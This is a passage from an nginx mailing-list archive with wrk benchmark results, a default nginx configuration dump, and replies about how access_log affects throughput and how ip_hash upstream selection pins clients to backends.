216.85ms 95.66% Req/Sec 1.55k 279.44 2.66k 73.49% 1478392 requests in 1.00m, 1.17GB read Requests/sec: 24633.34 Transfer/sec: 19.97MB + wrk -t16 -c48 -d1m http:// Running 1m test @ http:// 16 threads and 48 connections Thread Stats Avg Stdev Max +/- Stdev Latency 8.71ms 24.20ms 295.25ms 93.30% Req/Sec 1.54k 341.58 3.03k 70.92% 1472839 requests in 1.00m, 1.17GB read Requests/sec: 24540.14 Transfer/sec: 19.89MB + wrk -t16 -c72 -d1m http:// Running 1m test @ http:// 16 threads and 72 connections Thread Stats Avg Stdev Max +/- Stdev Latency 17.21ms 40.71ms 527.85ms 89.50% Req/Sec 1.55k 460.73 3.98k 68.62% 1477573 requests in 1.00m, 1.17GB read Requests/sec: 24620.15 Transfer/sec: 19.96MB + wrk -t16 -c96 -d1m http:// Running 1m test @ http:// 16 threads and 96 connections Thread Stats Avg Stdev Max +/- Stdev Latency 36.09ms 66.94ms 728.22ms 85.22% Req/Sec 1.56k 548.79 5.92k 70.25% 1475862 requests in 1.00m, 1.17GB read Requests/sec: 24591.50 Transfer/sec: 19.93MB + wrk -t16 -c120 -d1m http:// Running 1m test @ http:// 16 threads and 120 connections Thread Stats Avg Stdev Max +/- Stdev Latency 44.31ms 80.38ms 827.20ms 85.84% Req/Sec 1.56k 624.90 7.01k 71.66% 1474821 requests in 1.00m, 1.17GB read Requests/sec: 24569.45 Transfer/sec: 19.92MB + wrk -t16 -c200 -d1m http:// Running 1m test @ http:// 16 threads and 200 connections Thread Stats Avg Stdev Max +/- Stdev Latency 108.02ms 165.88ms 1.33s 81.91% Req/Sec 1.56k 717.25 9.04k 70.01% 1478936 requests in 1.00m, 1.17GB read Requests/sec: 24642.54 Transfer/sec: 19.97MB + wrk -t16 -c300 -d1m http:// Running 1m test @ http:// 16 threads and 300 connections Thread Stats Avg Stdev Max +/- Stdev Latency 112.68ms 193.21ms 1.87s 83.02% Req/Sec 1.54k 774.83 10.79k 69.02% 1450211 requests in 1.00m, 1.15GB read Socket errors: connect 0, read 0, write 0, timeout 35 Requests/sec: 24161.27 Transfer/sec: 19.58MB + wrk -t16 -c400 -d1m http:// Running 1m test @ http:// 16 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 94.84ms 182.77ms 1.76s 84.51% Req/Sec 1.58k 0.87k 9.04k 69.32% 1477150 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 14, write 0, timeout 44 Requests/sec: 24607.07 Transfer/sec: 19.95MB + wrk -t16 -c500 -d1m http:// Running 1m test @ http:// 16 threads and 500 connections Thread Stats Avg Stdev Max +/- Stdev Latency 82.97ms 176.81ms 1.80s 85.91% Req/Sec 1.57k 842.85 8.80k 68.98% 1483409 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 37, write 0, timeout 111 Requests/sec: 24712.25 Transfer/sec: 20.03MB + wrk -t16 -c1000 -d1m http:// Running 1m test @ http:// 16 threads and 1000 connections Thread Stats Avg Stdev Max +/- Stdev Latency 50.99ms 146.22ms 1.87s 90.23% Req/Sec 1.59k 1.00k 6.05k 67.26% 1476551 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 0, write 0, timeout 189 Requests/sec: 24597.04 Transfer/sec: 19.94MB + wrk -t32 -c32 -d1m http:// Running 1m test @ http:// 32 threads and 32 connections Thread Stats Avg Stdev Max +/- Stdev Latency 5.04ms 20.90ms 551.15ms 95.89% Req/Sec 784.23 217.89 2.21k 78.85% 1472562 requests in 1.00m, 1.17GB read Requests/sec: 24529.01 Transfer/sec: 19.88MB + wrk -t32 -c48 -d1m http:// Running 1m test @ http:// 32 threads and 48 connections Thread Stats Avg Stdev Max +/- Stdev Latency 3.37ms 11.92ms 245.37ms 96.30% Req/Sec 774.56 204.08 1.53k 76.20% 1475725 requests in 1.00m, 1.17GB read Requests/sec: 24580.86 Transfer/sec: 19.92MB + wrk -t32 -c72 -d1m http:// Running 1m test @ http:// 32 threads and 72 connections Thread Stats Avg Stdev Max +/- Stdev Latency 16.28ms 37.78ms 410.78ms 89.50% Req/Sec 779.67 313.76 2.02k 67.38% 1481461 requests in 1.00m, 1.17GB read Requests/sec: 24679.28 Transfer/sec: 20.00MB + wrk -t32 -c96 -d1m http:// Running 1m test @ http:// 32 threads and 96 connections Thread Stats Avg Stdev Max +/- Stdev Latency 36.23ms 67.24ms 732.91ms 85.27% Req/Sec 783.82 382.17 3.03k 67.87% 1476051 requests in 1.00m, 1.17GB read Requests/sec: 24589.76 Transfer/sec: 19.93MB + wrk -t32 -c120 -d1m http:// Running 1m test @ http:// 32 threads and 120 connections Thread Stats Avg Stdev Max +/- Stdev Latency 32.16ms 64.51ms 740.32ms 86.21% Req/Sec 784.59 387.94 3.02k 68.36% 1475008 requests in 1.00m, 1.17GB read Requests/sec: 24570.05 Transfer/sec: 19.92MB + wrk -t32 -c200 -d1m http:// Running 1m test @ http:// 32 threads and 200 connections Thread Stats Avg Stdev Max +/- Stdev Latency 108.19ms 165.93ms 1.30s 81.86% Req/Sec 809.75 507.62 6.00k 70.29% 1485154 requests in 1.00m, 1.18GB read Requests/sec: 24739.18 Transfer/sec: 20.05MB + wrk -t32 -c300 -d1m http:// Running 1m test @ http:// 32 threads and 300 connections Thread Stats Avg Stdev Max +/- Stdev Latency 112.47ms 192.19ms 1.80s 82.92% Req/Sec 820.73 534.45 8.41k 70.69% 1481318 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 0, write 0, timeout 22 Requests/sec: 24674.91 Transfer/sec: 20.00MB + wrk -t32 -c400 -d1m http:// Running 1m test @ http:// 32 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 95.58ms 184.69ms 1.78s 84.55% Req/Sec 831.80 563.83 9.21k 70.44% 1483434 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 24, write 0, timeout 60 Requests/sec: 24709.63 Transfer/sec: 20.03MB + wrk -t32 -c500 -d1m http:// Running 1m test @ http:// 32 threads and 500 connections Thread Stats Avg Stdev Max +/- Stdev Latency 82.25ms 174.44ms 1.83s 85.86% Req/Sec 848.41 609.18 11.97k 70.96% 1481738 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 0, write 0, timeout 71 Requests/sec: 24681.93 Transfer/sec: 20.01MB + wrk -t32 -c1000 -d1m http:// Running 1m test @ http:// 32 threads and 1000 connections Thread Stats Avg Stdev Max +/- Stdev Latency 51.30ms 147.85ms 1.90s 90.20% Req/Sec 0.93k 734.15 6.80k 71.46% 1473680 requests in 1.00m, 1.17GB read Socket errors: connect 3, read 23, write 0, timeout 155 Requests/sec: 24543.22 Transfer/sec: 19.89MB Results: access_log off; + wrk -t8 -c8 -d1m http:// Running 1m test @ http:// 8 threads and 8 connections Thread Stats Avg Stdev Max +/- Stdev Latency 774.84us 2.68ms 49.44ms 96.78% Req/Sec 2.80k 469.76 4.41k 74.47% 1339638 requests in 1.00m, 1.06GB read Requests/sec: 22290.17 Transfer/sec: 18.07MB + wrk -t16 -c16 -d1m http:// Running 1m test @ http:// 16 threads and 16 connections Thread Stats Avg Stdev Max +/- Stdev Latency 1.31ms 4.55ms 87.05ms 96.49% Req/Sec 1.79k 367.84 4.05k 71.29% 1707362 requests in 1.00m, 1.35GB read Requests/sec: 28408.74 Transfer/sec: 23.03MB + wrk -t16 -c24 -d1m http:// Running 1m test @ http:// 16 threads and 24 connections Thread Stats Avg Stdev Max +/- Stdev Latency 1.06ms 3.74ms 91.75ms 97.50% Req/Sec 1.79k 368.82 5.17k 70.85% 1711617 requests in 1.00m, 1.35GB read Requests/sec: 28479.84 Transfer/sec: 23.09MB + wrk -t16 -c32 -d1m http:// Running 1m test @ http:// 16 threads and 32 connections Thread Stats Avg Stdev Max +/- Stdev Latency 3.23ms 10.78ms 329.27ms 95.58% Req/Sec 1.59k 374.95 3.19k 67.44% 1522660 requests in 1.00m, 1.21GB read Requests/sec: 25373.32 Transfer/sec: 20.57MB + wrk -t16 -c48 -d1m http:// Running 1m test @ http:// 16 threads and 48 connections Thread Stats Avg Stdev Max +/- Stdev Latency 5.00ms 16.21ms 455.01ms 96.40% Req/Sec 1.37k 306.37 3.03k 70.59% 1302599 requests in 1.00m, 1.03GB read Requests/sec: 21701.73 Transfer/sec: 17.59MB + wrk -t16 -c72 -d1m http:// Running 1m test @ http:// 16 threads and 72 connections Thread Stats Avg Stdev Max +/- Stdev Latency 5.37ms 14.98ms 533.50ms 96.97% Req/Sec 1.24k 240.24 4.04k 81.22% 1180599 requests in 1.00m, 0.93GB read Requests/sec: 19669.01 Transfer/sec: 15.94MB + wrk -t16 -c96 -d1m http:// Running 1m test @ http:// 16 threads and 96 connections Thread Stats Avg Stdev Max +/- Stdev Latency 9.79ms 24.35ms 643.73ms 96.02% Req/Sec 1.24k 395.64 5.50k 73.35% 1177464 requests in 1.00m, 0.93GB read Requests/sec: 19616.52 Transfer/sec: 15.90MB + wrk -t16 -c120 -d1m http:// Running 1m test @ http:// 16 threads and 120 connections Thread Stats Avg Stdev Max +/- Stdev Latency 12.13ms 30.99ms 665.51ms 95.94% Req/Sec 1.25k 480.20 7.07k 74.10% 1189399 requests in 1.00m, 0.94GB read Requests/sec: 19815.90 Transfer/sec: 16.06MB + wrk -t16 -c200 -d1m http:// Running 1m test @ http:// 16 threads and 200 connections Thread Stats Avg Stdev Max +/- Stdev Latency 22.18ms 39.70ms 919.60ms 91.24% Req/Sec 1.27k 610.20 10.33k 75.28% 1200493 requests in 1.00m, 0.95GB read Requests/sec: 20001.03 Transfer/sec: 16.21MB + wrk -t16 -c300 -d1m http:// Running 1m test @ http:// 16 threads and 300 connections Thread Stats Avg Stdev Max +/- Stdev Latency 36.75ms 56.08ms 657.81ms 87.76% Req/Sec 1.27k 574.61 9.56k 69.81% 1211597 requests in 1.00m, 0.96GB read Requests/sec: 20185.21 Transfer/sec: 16.36MB + wrk -t16 -c400 -d1m http:// Running 1m test @ http:// 16 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 58.44ms 90.62ms 1.05s 87.38% Req/Sec 1.29k 607.24 4.69k 68.92% 1232007 requests in 1.00m, 0.98GB read Requests/sec: 20526.47 Transfer/sec: 16.64MB + wrk -t16 -c500 -d1m http:// Running 1m test @ http:// 16 threads and 500 connections Thread Stats Avg Stdev Max +/- Stdev Latency 78.26ms 119.85ms 1.27s 86.15% Req/Sec 1.30k 609.41 4.59k 68.02% 1238043 requests in 1.00m, 0.98GB read Requests/sec: 20626.14 Transfer/sec: 16.72MB + wrk -t16 -c1000 -d1m http:// Running 1m test @ http:// 16 threads and 1000 connections Thread Stats Avg Stdev Max +/- Stdev Latency 164.28ms 251.12ms 2.00s 85.33% Req/Sec 1.33k 634.64 5.14k 70.25% 1268711 requests in 1.00m, 1.00GB read Socket errors: connect 0, read 0, write 0, timeout 473 Requests/sec: 21137.30 Transfer/sec: 17.13MB + wrk -t32 -c32 -d1m http:// Running 1m test @ http:// 32 threads and 32 connections Thread Stats Avg Stdev Max +/- Stdev Latency 3.18ms 10.92ms 311.69ms 95.72% Req/Sec 800.01 260.79 1.62k 65.96% 1526047 requests in 1.00m, 1.21GB read Requests/sec: 25425.33 Transfer/sec: 20.61MB + wrk -t32 -c48 -d1m http:// Running 1m test @ http:// 32 threads and 48 connections Thread Stats Avg Stdev Max +/- Stdev Latency 2.72ms 9.45ms 317.84ms 96.37% Req/Sec 801.31 266.52 1.74k 65.56% 1528825 requests in 1.00m, 1.21GB read Requests/sec: 25471.82 Transfer/sec: 20.65MB + wrk -t32 -c72 -d1m http:// Running 1m test @ http:// 32 threads and 72 connections Thread Stats Avg Stdev Max +/- Stdev Latency 4.87ms 12.19ms 397.58ms 96.75% Req/Sec 616.49 141.23 2.02k 73.03% 1177789 requests in 1.00m, 0.93GB read Requests/sec: 19619.93 Transfer/sec: 15.90MB + wrk -t32 -c96 -d1m http:// Running 1m test @ http:// 32 threads and 96 connections Thread Stats Avg Stdev Max +/- Stdev Latency 9.89ms 21.94ms 542.41ms 94.81% Req/Sec 628.32 283.23 2.99k 71.33% 1199534 requests in 1.00m, 0.95GB read Requests/sec: 19978.86 Transfer/sec: 16.19MB + wrk -t32 -c120 -d1m http:// Running 1m test @ http:// 32 threads and 120 connections Thread Stats Avg Stdev Max +/- Stdev Latency 10.58ms 31.92ms 706.99ms 96.66% Req/Sec 629.12 297.85 3.02k 70.08% 1195385 requests in 1.00m, 0.95GB read Requests/sec: 19913.97 Transfer/sec: 16.14MB + wrk -t32 -c200 -d1m http:// Running 1m test @ http:// 32 threads and 200 connections Thread Stats Avg Stdev Max +/- Stdev Latency 22.31ms 43.63ms 1.06s 93.06% Req/Sec 641.57 423.60 5.97k 69.57% 1213269 requests in 1.00m, 0.96GB read Requests/sec: 20210.94 Transfer/sec: 16.38MB + wrk -t32 -c300 -d1m http:// Running 1m test @ http:// 32 threads and 300 connections Thread Stats Avg Stdev Max +/- Stdev Latency 35.67ms 58.67ms 965.84ms 89.02% Req/Sec 648.76 458.09 7.70k 70.86% 1221406 requests in 1.00m, 0.97GB read Requests/sec: 20347.10 Transfer/sec: 16.49MB + wrk -t32 -c400 -d1m http:// Running 1m test @ http:// 32 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 49.30ms 76.09ms 1.32s 87.03% Req/Sec 652.46 467.17 9.95k 68.56% 1227466 requests in 1.00m, 0.97GB read Requests/sec: 20447.03 Transfer/sec: 16.57MB + wrk -t32 -c500 -d1m http:// Running 1m test @ http:// 32 threads and 500 connections Thread Stats Avg Stdev Max +/- Stdev Latency 63.83ms 93.94ms 1.35s 85.94% Req/Sec 651.42 460.18 3.28k 65.49% 1243957 requests in 1.00m, 0.98GB read Requests/sec: 20723.24 Transfer/sec: 16.80MB + wrk -t32 -c1000 -d1m http:// Running 1m test @ http:// 32 threads and 1000 connections Thread Stats Avg Stdev Max +/- Stdev Latency 161.91ms 255.76ms 2.00s 85.74% Req/Sec 659.45 437.48 3.99k 69.13% 1257867 requests in 1.00m, 1.00GB read Socket errors: connect 3, read 0, write 0, timeout 1163 Requests/sec: 20952.53 Transfer/sec: 16.98MB NGINX config: root at ubuntu:/home/ubuntu# nginx -T nginx: the configuration file /etc/nginx/nginx.conf syntax is ok nginx: configuration file /etc/nginx/nginx.conf test is successful # configuration file /etc/nginx/nginx.conf: user www-data; worker_processes auto; pid /run/nginx.pid; events { worker_connections 768; # multi_accept on; } http { ## # Basic Settings ## sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; # server_tokens off; # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # SSL Settings ## ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE ssl_prefer_server_ciphers on; ## # Logging Settings ## #access_log /var/log/nginx/access.log; access_log off; error_log /var/log/nginx/error.log; ## # Gzip Settings ## gzip on; gzip_disable "msie6"; # gzip_vary on; # gzip_proxied any; # gzip_comp_level 6; # gzip_buffers 16 8k; # gzip_http_version 1.1; # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript; ## # Virtual Host Configs ## include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; } #mail { # # See sample authentication script at: # # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript # # # auth_http localhost/auth.php; # # pop3_capabilities "TOP" "USER"; # # imap_capabilities "IMAP4rev1" "UIDPLUS"; # # server { # listen localhost:110; # protocol pop3; # proxy on; # } # # server { # listen localhost:143; # protocol imap; # proxy on; # } #} # configuration file /etc/nginx/mime.types: types { text/html html htm shtml; text/css css; text/xml xml; image/gif gif; image/jpeg jpeg jpg; application/javascript js; application/atom+xml atom; application/rss+xml rss; text/mathml mml; text/plain txt; text/vnd.sun.j2me.app-descriptor jad; text/vnd.wap.wml wml; text/x-component htc; image/png png; image/tiff tif tiff; image/vnd.wap.wbmp wbmp; image/x-icon ico; image/x-jng jng; image/x-ms-bmp bmp; image/svg+xml svg svgz; image/webp webp; application/font-woff woff; application/java-archive jar war ear; application/json json; application/mac-binhex40 hqx; application/msword doc; application/pdf pdf; application/postscript ps eps ai; application/rtf rtf; application/vnd.apple.mpegurl m3u8; application/vnd.ms-excel xls; application/vnd.ms-fontobject eot; application/vnd.ms-powerpoint ppt; application/vnd.wap.wmlc wmlc; application/vnd.google-earth.kml+xml kml; application/vnd.google-earth.kmz kmz; application/x-7z-compressed 7z; application/x-cocoa cco; application/x-java-archive-diff jardiff; application/x-java-jnlp-file jnlp; application/x-makeself run; application/x-perl pl pm; application/x-pilot prc pdb; application/x-rar-compressed rar; application/x-redhat-package-manager rpm; application/x-sea sea; application/x-shockwave-flash swf; application/x-stuffit sit; application/x-tcl tcl tk; application/x-x509-ca-cert der pem crt; application/x-xpinstall xpi; application/xhtml+xml xhtml; application/xspf+xml xspf; application/zip zip; application/octet-stream bin exe dll; application/octet-stream deb; application/octet-stream dmg; application/octet-stream iso img; application/octet-stream msi msp msm; application/vnd.openxmlformats-officedocument.wordprocessingml.document docx; application/vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx; application/vnd.openxmlformats-officedocument.presentationml.presentation pptx; audio/midi mid midi kar; audio/mpeg mp3; audio/ogg ogg; audio/x-m4a m4a; audio/x-realaudio ra; video/3gpp 3gpp 3gp; video/mp2t ts; video/mp4 mp4; video/mpeg mpeg mpg; video/quicktime mov; video/webm webm; video/x-flv flv; video/x-m4v m4v; video/x-mng mng; video/x-ms-asf asx asf; video/x-ms-wmv wmv; video/x-msvideo avi; } # configuration file /etc/nginx/sites-enabled/default: ## # You should look at the following URL's in order to grasp a solid understanding # of Nginx configuration files in order to fully unleash the power of Nginx. # http://wiki.nginx.org/Pitfalls # http://wiki.nginx.org/QuickStart # http://wiki.nginx.org/Configuration # # Generally, you will want to move this file somewhere, and start with a clean # file but keep this around for reference. Or just disable in sites-enabled. # # Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples. ## # Default server configuration # server { listen 80 default_server; listen [::]:80 default_server; # SSL configuration # # listen 443 ssl default_server; # listen [::]:443 ssl default_server; # # Note: You should disable gzip for SSL traffic. # See: https://bugs.debian.org/773332 # # Read up on ssl_ciphers to ensure a secure configuration. # See: https://bugs.debian.org/765782 # # Self signed certs generated by the ssl-cert package # Don't use them in a production server! # # include snippets/snakeoil.conf; root /var/www/html; # Add index.php to the list if you are using PHP index index.html index.htm index.nginx-debian.html; server_name _; location / { # First attempt to serve request as file, then # as directory, then fall back to displaying a 404. try_files $uri $uri/ =404; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # include snippets/fastcgi-php.conf; # # # With php7.0-cgi alone: # fastcgi_pass 127.0.0.1:9000; # # With php7.0-fpm: # fastcgi_pass unix:/var/run/php7.0-fpm.sock; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } # Virtual Host configuration for example.com # # You can move that to a different file under sites-available/ and symlink that # to sites-enabled/ to enable it. # #server { # listen 80; # listen [::]:80; # # server_name example.com; # # root /var/www/example.com; # index index.html; # # location / { # try_files $uri $uri/ =404; # } #} Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268609,268609#msg-268609 From project722 at gmail.com Thu Jul 28 14:32:18 2016 From: project722 at gmail.com (Brian Pugh) Date: Thu, 28 Jul 2016 09:32:18 -0500 Subject: session persistance with IP hash In-Reply-To: References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze> Message-ID: Yesterday once I got the traffic going to the backend servers from nginx I noticed that I was pinned to "backend3", which is last in the order. And since I am the one setting this up I am the only user. So I changed up my order just to see the effects of calculating a new hash. Instead of: upstream backend { backend1 backend2 backend3 } I listed them in the order: upstream backend { backend2 backend3 backend1 } then restarted nginx. At that point my traffic was pinned to backend1. This seems a bit odd to me in that it seems to be always choosing the last server in the order. Any thoughts on what might be happening and why it did not pin me to backend1 the first time and backend2 the second time? On Wed, Jul 27, 2016 at 8:44 PM, Robert Paprocki < rpaprocki at fearnothingproductions.net> wrote: > >> I'm not as concerned with what server its routed to as much as I am >> concerned with the client session "sticking" to the server it was routed >> to. And I really do not know enough about how to use cookie based hashing. >> In order to have cookie bashed hashing would the cookie need to be common >> among all pages at the target URL in order to stick the session to a >> particular server for the duration of that session? >> > > Assuming you're using a cookie to track the session, the cookie shouldn't > change depending on what URI the user is accessing. > > >> (And, I assume cookie bashed hashing is not like ip hash in that you are >> only stuck to a particular server for the duration of that browser session?) >> > > Depends on how long the cookie lives on the browser. If the cookie never > changes and doesn't expire when the browser closes, the backend wouldn't > change (again, assuming nothing changed about the backend servers). > > It doesn't matter what is used to build the hash key - cookie, ip, > whatever. As long as that value doesn't change, and nothing changes about > your backends, the client will hit the same backend every time. Guaranteed. > > >> Also, what is the logic behind "round-robin" or is that the same as >> ip_hash? For instance, If I have a client at 192.168.100.10 that's assigned >> to backend 3, then, 100 more clients come along on the same subnet, they >> will all land on backend 3. Next client 192.168.200.10 comes along, what >> determines whether it lands on backend1 or backend2? Or, is there a chance >> it could also land on backend3? >> > > Round robin means that each backend will be used in turn, regardless of > the client. For example, if you have 3 backends: > > request 1 -> backend1 > request 2 -> backend2 > request 3 -> backend3 > request 4 -> backend1 > request 5 -> backend2 > > This goes on forever, regardless of the client IP. (Of course, this is > relative if you are using server weights - see the example at > http://nginx.org/en/docs/http/ngx_http_upstream_module.html#upstream for > a round robin example with weights). If you want session persistence, then > round robin balancing is not for you. > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Thu Jul 28 15:21:35 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 28 Jul 2016 18:21:35 +0300 Subject: Access_log off impact on Requests/sec In-Reply-To: <0fbcdb783d9117b1faade44918ba7612.NginxMailingListEnglish@forum.nginx.org> References: <0fbcdb783d9117b1faade44918ba7612.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160728152135.GU57459@mdounin.ru> Hello! On Thu, Jul 28, 2016 at 10:32:13AM -0400, stevewin wrote: > I am beginning to look at NGINX performance on a development system with > traffic driven by Wrk. Initially I am just looking at static HTTP serving. > > I am using NGINX v1.10.1 running on the host system with Ubuntu 16.04. Wrk > v4.0.4 is running from a separate client platform over a private 40GB > connection. The CPU on the host system has 24 cores (no hyperthreading). > > I had started to look into various NGINX and kernel parameters for > performance optimization. One thing that I am seeing that appears odd to me > is that when I change access_log to off (from the default of specifying a > log location) it seems to decrease the requests/sec that I am seeing when > connections increase (using defaults with everything else being equal). > Does this make sense? > > The results with defaults including ?access_log /var/log/nginx/access.log;? > show the Requests/sec ramping up to ~24.5K and staying there. > > The results with defaults and access_log changed to ?access_log off;? show > the Requests/sec initially ramping up to ~28.5K but then decreasing down to > ~20K and staying there. > > The NGINX config is at the bottom. > > Can someone explain possible reasons for this behavior? Benchmarking with small number of connections and multiple worker processes known to be seriously affected by non-uniform distribution of connections between worker processes. And various minor changes like switching off logs may cause unexpected results similar to what you observe - because they change distribution of connections between worker processes, and this in turn changes things drammatically. Some things to try if you want to get more accurate results: - switch off accept mutex, http://nginx.org/r/accept_mutex. It is off by default since nginx 1.11.3, but you are using an older version. - try using "listen ... reuseport", http://nginx.org/r/listen. It has various unwanted side-effects and I won't recommend using it without a good reason, but it will ensure uniform distribution of connections between workers and will give you a good idea of how many requests your system can really handle in a paritcular configuration. Note well that there are various system and configuration limits that needs tuning as well, including number of worker connections in nginx, listen backlog, as well as number of local tcp ports available on the client side. Timeouts as seen in your wrk results indicate that you are likely hitting at least some. -- Maxim Dounin http://nginx.org/ From r at roze.lv Thu Jul 28 15:33:40 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 28 Jul 2016 18:33:40 +0300 Subject: Access_log off impact on Requests/sec In-Reply-To: <0fbcdb783d9117b1faade44918ba7612.NginxMailingListEnglish@forum.nginx.org> References: <0fbcdb783d9117b1faade44918ba7612.NginxMailingListEnglish@forum.nginx.org> Message-ID: <146C468554894261B4FF293B9C93034D@MezhRoze> > The results with defaults including ?access_log /var/log/nginx/access.log;? > show the Requests/sec ramping up to ~24.5K and staying there. > The results with defaults and access_log changed to ?access_log off;? show the Requests/sec initially ramping up to ~28.5K but then decreasing down to ~20K and staying there. > The NGINX config is at the bottom. > Can someone explain possible reasons for this behavior? First of all you should probably somehow format your benchmark results in more readable format (table or something) as looking at them now is counterintuitive (also it's better to keep the configuration at minimum and no need for default config files like mime.types etc). Second - against what exactly are you testing? As your benchmark numbers looked odd (and somewhat low) out of interest I did few tests against bare 1.10.3 nginx (the default index.htm) page (on a server with 12 cores - nginx runs on 8 workers). I took your heaviest test -t32 -c1000 -d1m (32 threads and 1000 connections) without access_log: Running 1m test @ http:/// 32 threads and 1000 connections Thread Stats Avg Stdev Max +/- Stdev Latency 65.40ms 140.79ms 1.96s 92.52% Req/Sec 4.06k 1.34k 25.27k 75.02% 7746479 requests in 1.00m, 6.13GB read Requests/sec: 128893.40 Transfer/sec: 104.48MB With access_log: 32 threads and 1000 connections Thread Stats Avg Stdev Max +/- Stdev Latency 84.17ms 193.73ms 2.00s 92.17% Req/Sec 4.05k 1.48k 36.23k 74.44% 7724438 requests in 1.00m, 6.11GB read Requests/sec: 128526.82 Transfer/sec: 104.18MB And I'm bassically limited to the 1Gbit network between servers (I'll try to test on some higher core machine later so there is one nginx worker for each Wrk thread and/or running on the same box againt 'lo') but I couldn't replicate any significant difference of having the log on or off. rr From rpaprocki at fearnothingproductions.net Thu Jul 28 16:07:00 2016 From: rpaprocki at fearnothingproductions.net (Robert Paprocki) Date: Thu, 28 Jul 2016 09:07:00 -0700 Subject: session persistance with IP hash In-Reply-To: References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze> Message-ID: Hello, On Thu, Jul 28, 2016 at 7:32 AM, Brian Pugh wrote: > Yesterday once I got the traffic going to the backend servers from nginx I > noticed that I was pinned to "backend3", which is last in the order. And > since I am the one setting this up I am the only user. So I changed up my > order just to see the effects of calculating a new hash. Instead of: > > upstream backend { > backend1 > backend2 > backend3 > } > > I listed them in the order: > > upstream backend { > backend2 > backend3 > backend1 > } > > then restarted nginx. At that point my traffic was pinned to backend1. > This seems a bit odd to me in that it seems to be always choosing the last > server in the order. Any thoughts on what might be happening and why it did > not pin me to backend1 the first time and backend2 the second time? > This sounds exactly like what should be expected. To better understand, let's look at a simple example of how hash-based selection _might_ occur (I say "might" because this is not exactly how Nginx performs its hashing, I'm simplifying for examples' sake, but it's good enough). We'll make a few assumptions: - The hash key in this example is your IP address (we'll use 127.0.0.1 for simplicity) - We will assume each backend has the same weight - Arrays are zero indexed - Our upstream block looks like such: upstream backend { backend1 backend2 backend3 } - We will kindly remember this is a conceptual example and not how Nginx does things under the hood (but this is clear enough) Let's say that the whole upstream definition creates an array of servers, so in your first example you'd have an array of: upstreams = { "backend1", "backend2", "backend3" } The key "127.0.0.1" is run through a mathematical hash function to create an integer, and it will create the same integer every single time its run. For our example, let's say that hash("127.0.0.1") equals the number 438653. In order to select which backend to use, we compute our hash value 438652, modulo the number of backends we have in our upstream (is essentially the remainder after division). So, 438653 % 3 = 2 So we get index 2 from our array. Remember that our conceptual array is zero-indexed, so we select upstreams[2], or the third element in our array, which is "backend3". Every time a backend is selected for the key "127.0.0.1", "backend3" will be used. because that's the result of looking up upstreams[2]. Now, let's change the upstream block to such: upstream backend { backend2 backend3 backend1 } Assuming nothing else has changed, we run through the same process again. hash("127.0.0.1") is 438653, and 438653 % 3 is still 2. So, we look up upstreams[2] (the third element in our array, same as last time), and we get "backend1". Given this upstream configuration, we will get the same result every time. In this example, the order we define backends matters, and this can be used to explain your results perfectly. You shouldn't expect that your key will be hashed to the first backend in your upstream block, you should only expect that the same key will produce the same _relative_ result every time it is hashed. (And again to note, Nginx does do things slightly differently, rr peers are defined as a linked list, not an array, and lookup is not strictly hashval % list length; this is a conceptual example _only_) -------------- next part -------------- An HTML attachment was scrubbed... URL: From project722 at gmail.com Thu Jul 28 16:41:11 2016 From: project722 at gmail.com (Brian Pugh) Date: Thu, 28 Jul 2016 11:41:11 -0500 Subject: session persistance with IP hash In-Reply-To: References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze> Message-ID: Very thorough and detailed explanation, even if it was "simplified". Both you and Reinis have been a tremendous help. On Thu, Jul 28, 2016 at 11:07 AM, Robert Paprocki < rpaprocki at fearnothingproductions.net> wrote: > Hello, > > On Thu, Jul 28, 2016 at 7:32 AM, Brian Pugh wrote: > >> Yesterday once I got the traffic going to the backend servers from nginx >> I noticed that I was pinned to "backend3", which is last in the order. And >> since I am the one setting this up I am the only user. So I changed up my >> order just to see the effects of calculating a new hash. Instead of: >> >> upstream backend { >> backend1 >> backend2 >> backend3 >> } >> >> I listed them in the order: >> >> upstream backend { >> backend2 >> backend3 >> backend1 >> } >> >> then restarted nginx. At that point my traffic was pinned to backend1. >> This seems a bit odd to me in that it seems to be always choosing the last >> server in the order. Any thoughts on what might be happening and why it did >> not pin me to backend1 the first time and backend2 the second time? >> > > This sounds exactly like what should be expected. To better understand, > let's look at a simple example of how hash-based selection _might_ occur (I > say "might" because this is not exactly how Nginx performs its hashing, I'm > simplifying for examples' sake, but it's good enough). We'll make a few > assumptions: > > - The hash key in this example is your IP address (we'll use 127.0.0.1 for > simplicity) > - We will assume each backend has the same weight > - Arrays are zero indexed > - Our upstream block looks like such: > upstream backend { > backend1 > backend2 > 